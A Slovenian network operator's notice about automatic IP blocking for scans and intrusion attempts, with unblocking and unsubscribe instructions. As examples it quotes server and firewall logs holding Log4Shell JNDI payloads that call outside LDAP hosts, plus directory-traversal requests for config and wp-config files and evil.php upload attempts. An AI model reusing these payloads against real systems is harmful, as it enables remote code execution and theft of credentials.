V kolikor izvajate ilegalna skeniranja (nedovoljeni scan) omrežja ali ilegalni dostop do baz podatkov bo povzročilo zaklep vašega trenutnega IP preko katerega se povezujete na to omrežje za daljši čas, če omrežje, ni nam znano, bo blokada tega IP naslova za vedno oz. 1-2 tedena!
V kolikor vas je blokiralo in če uporabljate Slovensko omrežje, se vas avtomatično od-blokira v roku 1 ure ali maksimalno do 48 ur!!! Odvisno je od prepovedanega dejanja, ki ste ga izvršili na tem omrežju! V kolikor uporabljate vaš tuji strežnik nam to sporočite in posredujte IP vašega strežnika oz. računalnika, da se vas doda v Allow oz. med odobrene IP za popolni dostop!
V vaši nadzorni plošči, kjerkoli za aplikacije DDLE, Media Server, HomeCustomSoftApps, HCS@2000 in Enigma programsko opremo v kolikor nočete prejemati več na vaš GSM ali elektronsko pošto sporočila greste v menu “Moj Račun” pod rubriko “e-sporočila” ali “SMS” takoj spodaj pod e-sporočila in odkljukajte, da ni več označeno polje “obvestila” – za blog ali forum strani pa v vaši nadzorni plošči odprite rubriko “Signup” oz. naročila in “Unsubscribe” oz. odjavi se za prejemanje nadaljnjih informacij preko naših Blog ali Forum Strani!!!
Primer kateri vas zaklene tukaj za vedno, poizvedba ali poizkus izvršitve oddaljene kode na teh serverjih oz. strežnikih ISP oz. ponudnika dostopa do interneta EU ali katerem koli drugem slovenskem ISP, kjer smo lastniki ali solastniki strežnikov:
IP napadalca – Naš IP HTUSi66 – Datum – Dejanje log datoteka…..
91.200.100.126 - 89.212.137.96 - - [21/Dec/2021:17:45:25 +0100] "CONNECT 45.93.250.187:4444 HTTP/1.1" 405 2001 "-" "-"
91.200.100.126 - 89.212.137.96 - - [21/Dec/2021:16:33:46 +0100] "CONNECT 45.93.250.187:4444 HTTP/1.1" 405 2001 "-" "-"
91.200.100.126 - 89.212.137.96 - - [21/Dec/2021:15:23:09 +0100] "CONNECT 45.93.250.187:4444 HTTP/1.1" 405 2001 "-" "-"
195.189.96.245 - 89.212.137.96 - - [18/Dec/2021:23:07:07 +0100] "CONNECT 91.200.100.126:4444 HTTP/1.1" 405 2002 "-" "-"
150.158.189.96 - 89.212.137.96 - - [21/Dec/2021:12:20:44 +0100] "GET / HTTP/1.1" 200 5037 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
178.176.202.121 - 89.212.137.96 - - [21/Dec/2021:01:05:47 +0100] "GET / HTTP/1.1" 200 5037 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
178.176.202.121 - 89.212.137.96 - - [21/Dec/2021:01:05:47 +0100] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 404 914 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
2.57.121.36 - 89.212.137.96 - - [20/Dec/2021:02:14:14 +0100] "GET / HTTP/1.1" 400 0 "-" "${jndi:ldap://2.57.121.36:8000/#mss}"
175.6.210.66 - 89.212.137.96 - - [19/Dec/2021:06:00:04 +0100] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 302 523 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
211.154.194.21 - 89.212.137.96 - - [16/Dec/2021:01:33:36 +0100] "GET / HTTP/1.1" 302 523 "-" "${jndi:ldap://185.224.139.151:1389/Exploit}"
211.154.194.21 - 89.212.137.96 - - [16/Dec/2021:01:33:36 +0100] "GET /${jndi:ldap://185.224.139.151:1389/Exploit} HTTP/1.1" 302 523 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
ipd... oz. itd.... ali npr. primer napada iz log datoteke HCS-AVFWCMSD8:
20/Dec/21 08:28:34 #4121914 CRITICAL 1 188.166.173.93 GET /index.php - Directory traversal #1 - [GET:link = ../../config.inc.php] - perc.ddns.net
20/Dec/21 08:28:34 #4122240 CRITICAL - 188.166.173.93 POST /index.php - Blocked file upload attempt (MIME-type mismatch) - [evil.php != image/png] - perc.ddns.net
20/Dec/21 08:28:41 #7173822 MEDIUM - 188.166.173.93 GET /admin/admin-setup.php - Blocked access to admin-setup.php - [bot detection is enabled] - perc.ddns.net
20/Dec/21 08:28:42 #5644802 MEDIUM - 188.166.173.93 GET /admin/admin-setup.php - Blocked access to admin-setup.php - [bot detection is enabled] - perc.ddns.net
20/Dec/21 08:28:47 #7342328 MEDIUM - 188.166.173.93 GET /admin/admin-setup.php - Blocked access to admin-setup.php - [bot detection is enabled] - perc.ddns.net
20/Dec/21 08:28:48 #5012036 CRITICAL 1 188.166.173.93 GET /index.php - Directory traversal #1 - [GET:mla_download_file = ../../../../config.inc.php] - perc.ddns.net
20/Dec/21 08:28:53 #8805127 CRITICAL 1 188.166.173.93 GET /index.php - Directory traversal #1 - [GET:pl = /../../../../../config.inc.php] - perc.ddns.net
20/Dec/21 08:28:59 #4559724 MEDIUM - 188.166.173.93 GET /admin/admin-setup.php - Blocked access to admin-ajax.php - [bot detection is enabled] - perc.ddns.net
20/Dec/21 08:28:59 #7795954 MEDIUM - 188.166.173.93 GET /admin/admin-setup.php - Blocked access to admin-ajax.php - [bot detection is enabled] - perc.ddns.net
20/Dec/21 08:28:59 #5469855 HIGH 310 188.166.173.93 GET /admin/admin.php - Access to a configuration file - [GET:download = /../config.php] - perc.ddns.net
20/Dec/21 08:28:59 #2160622 CRITICAL 1 188.166.173.93 GET /index.php - Directory traversal #1 - [GET:file = ../../../../config.inc.php] - perc.ddns.net
20/Dec/21 08:28:59 #5913805 CRITICAL 1 188.166.173.93 GET /index.php - Directory traversal #1 - [GET:sub_page = ../../../../../config.php] - perc.ddns.net
20/Dec/21 08:29:05 #5437373 CRITICAL 1 188.166.173.93 GET /index.php - Directory traversal #1 - [GET:file = ../../../../config.php] - perc.ddns.net
20/Dec/21 08:29:10 #3335612 CRITICAL 1 188.166.173.93 GET /index.php - Directory traversal #1 - [GET:fileurl = ../../../config.inc.php] - perc.ddns.net
20/Dec/21 08:29:10 #3684171 CRITICAL 1 188.166.173.93 GET /index.php - Directory traversal #1 - [GET:ajax_path = /../../../../../../../config.inc.php] - perc.ddns.net
20/Dec/21 08:29:10 #7069610 MEDIUM - 188.166.173.93 GET /admin/admin-setup.php - Blocked access to admin-ajax.php - [bot detection is enabled] - perc.ddns.net
20/Dec/21 08:29:10 #4840359 CRITICAL 1 188.166.173.93 GET /index.php - Directory traversal #1 - [GET:path = ../../../../../config.inc.php] - perc.ddns.net
20/Dec/21 08:29:11 #5588963 CRITICAL 1 188.166.173.93 GET /index.php - Directory traversal #1 - [GET:pic = ../../../../../wp-config.php] - perc.ddns.net
20/Dec/21 08:29:11 #4456089 MEDIUM - 188.166.173.93 POST /admin/admin-setup.php - Blocked access to admin-ajax.php - [bot detection is enabled] - perc.ddns.net
20/Dec/21 08:29:11 #1533568 MEDIUM - 188.166.173.93 POST /admin/admin-setup.php - Blocked access to admin-ajax.php - [bot detection is enabled] - perc.ddns.net
20/Dec/21 08:29:31 #3507523 MEDIUM - 188.166.173.93 GET /admin/login.php - Blocked access to the login page - [bot detection is enabled] - perc.ddns.net
20/Dec/21 08:29:36 #4351486 UPLOAD - 188.166.173.93 POST /wp-admin/admin-post.php - File upload detected, no action taken - [evil.zip (0 bytes)] - perc.ddns.net
20/Dec/21 08:29:43 #6425511 UPLOAD - 188.166.173.93 POST /index.php - File upload detected, no action taken - [evil.php (0 bytes)] - perc.ddns.net
20/Dec/21 08:29:43 #2734510 CRITICAL 8 188.166.173.93 POST /index.php - Suspicious file - [FILES:file = evil.php /tmp/phpwL838e] - perc.ddns.net
V kolikor vas zaklene, vendar zelo majhna verjetnost prosim pišite na ta epoštni naslov:
support@pcsnet.mywire.org
ali moj privatni gmail Boris oz. gmail od Sandija ali gmail skupnosti tri Piramide Studio Portorož!!!
Kot sem rekel verjetnost je zelo nizka, da bi vas zaklenilo, razen npr. če ste forsirali / težili z
neveljavnimi prijavami ali z uporabo nepravilnih pristopnih podatkov, v tem primeru boste odklenjeni
v roku 1 ure maksimalno pa 24-48 odvisno od vašega dejanja!!!!
V primeru, da vas v treh urah trikrat zaklene oz. v 4 dneh dobi z nekimi neveljavnimi in prepovedanimi dejanji tukaj, se vas blokira avtomatično za 4 tedne – PS logov ne gledamo in ne vodimo računa koga zaklene in kdo je prijavljen in kaj počne, to nas ne zanima, vaši osebni logi in vsa dejanja se avtomatično brišejo po 15 do maximum 45-60 dneh, odvisno od loga in zakonskih uredb le teh podatkov in glede računov ter spletnih storitev v Sloveniji oz. EU.